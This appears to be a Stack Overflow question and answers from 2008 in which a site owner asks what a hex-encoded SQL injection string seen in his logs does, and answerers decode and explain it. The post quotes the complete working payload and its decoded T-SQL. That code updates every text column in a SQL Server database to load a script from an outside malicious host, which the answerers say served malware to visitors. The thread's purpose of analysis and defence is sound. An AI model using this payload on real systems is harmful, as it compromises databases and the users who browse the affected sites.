tags:

views:

464

answers:

4
+4  Q: 

SQL injection attack - What is going on here?

I have seen this SQL injection attempt on my site many times in the last few months. 

';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

After going through my code, I'm sure I'm protected because I query against an in-memory dataset rather than the database itself. However, even though I'm sure I'm protected, I don't fully understand what's going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.

Can anyone explain to me what these hackers are attempting to do with this code?

Thanks.

-This code is getting appended to the query string as well as getting sent as post data.

+12  A: 

Note: my first explanation was incorrect because I didn't actually read through the whole thing...

here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

DECLARE 
    @T varchar(255),
    @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR 
    select a.name,b.name 
    from sysobjects a,syscolumns b 
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"&gt;&lt;/script&gt;
      <!--''+['+@C+'] where '+@C+' not like ''%">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"&gt;&lt;/script&gt;&lt;!--'
'')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
Jimmy  2008-12-15 22:57:22
@Jimmy: how did you decipher this?
Dan Vinton  2008-12-15 22:58:53
I ran it on my sql server :P
Jimmy  2008-12-15 22:59:51
if you wanted to do it manually, every 2 hex digits defines a number 0-255, which you look up in an ASCII table.
Jimmy  2008-12-15 23:02:52
Thanks, I'm glad I understand what's going on there now.It looks like one of those attacks that can be thwarted by the standard methods of avoiding SQL injection, but I'm glad I understand it further now.
Ryan Smith  2008-12-15 23:05:13
it's designed to defeat blacklists. another example of why blacklisting keywords is a bad idea
Jimmy  2008-12-15 23:05:47
"I ran it on my sql server" - Ha! +1 for bravery! It's a good way of obfuscating SQL anyway...
Dan Vinton  2008-12-15 23:35:46
I didn't run the last "EXEC(@S);", of course ;)
Jimmy  2008-12-15 23:39:17
+2  A: 

Further to Jimmy's post: you can also use a hex-ascii translator to get this:

DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR  FOR select 
a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT 
FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn
/csrs/w.js"></script>''+['+@C+'] where '+@C+' not like ''%"></title><script 
src="http://www2.s800qn.cn/csrss/w.js"&gt;&lt;/script&gt;''')FETCH NEXT FROM  Table_Cursor INTO 
@T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Michael Sharek  2008-12-15 23:01:48
I ran into this a while back and created a small Winforms app that will do the translation for you as well, thanks to some help from some SO folks here: http://www.codeplex.com/urldecoder
Dillie-O  2008-12-15 23:05:38
http://www.string-functions.com/hex-string.aspx
jms  2008-12-15 23:05:54
Wow, I went to all that crazy work and yet there was already a web site that slipped through my googling fingers... Well, at least I learned some new stuff through the process. 8^D
Dillie-O  2008-12-15 23:22:37
+4  A: 

Actually Jimmy, if you analyze this code, it uses a cursor to inject a javascript reference to http://www2.s800qn.cn/csrss/w.js in every text field in the database.

This means that they don't care about your database, what they want is to use your page to steal data from the users browsing it.

That javascript link is now dead, but it probably contained code to grab the users cookies.

FlySwat  2008-12-15 23:13:16
yeah, I noticed that after I posted my original answer, so I rewrote. Thanks for the catch
Jimmy  2008-12-15 23:15:57
Cripes... does StackOverflow automatically make any "http://blahblah.com" strings into active links? I know you didn't do that on purpose! :)
Bryan  2009-02-17 03:45:47
+2  A: 

Just to help if you haven't figured out already this is an automated attack not targeted. And the purpose of the included .js file is distributing malware by using your website and it includes several exploits mostly targets IE users.

dr. evil  2008-12-15 23:17:20

related questions

Is LINQ to SQL InsertOnSubmit() subject to SQL Injection Attack?
How Can I test my web site for SQL injection attacks?
Storing parts of user data in files for preventing SQL injection
HTTP input filter like mod_security for WebSphere?
Does LINQ's ExecuteCommand provide protection from SQL injection attacks?
Dynamic SQL - Search Query - Variable Number of Keywords
Classic ASP SQL Injection Protection
Comprehensive server-side validation
Can I protect against SQL Injection by escaping single-quote and surrounding user input with single-quotes?
Are PDO prepared statements sufficient to prevent SQL injection?
What's the best method for sanitizing user input with PHP?
Do htmlspecialchars and mysql_real_escape_string keep my PHP code safe from injection?
What percentage of my time will be spent in user input verfication during web development?
Parameterized SQL Columns?
Handling the data in an IN clause, with SQL parameters?
What should you do when coming across a publicly accessible security vulnerability?
binding variables to parameters in ADOdb for PHP
Penetration testing tools
Is there some way to inject SQL even if the ' character is deleted?
How do I programatically sanitise coldfusion cfquery parameters.
Best way to stop SQL Injection in PHP
Inform potential clients about security vulnerabilities?
When is it Best to Sanitize User Input?
What is the best way to avoid SQL injection attacks?
Catching SQL Injection and other Malicious Web Requests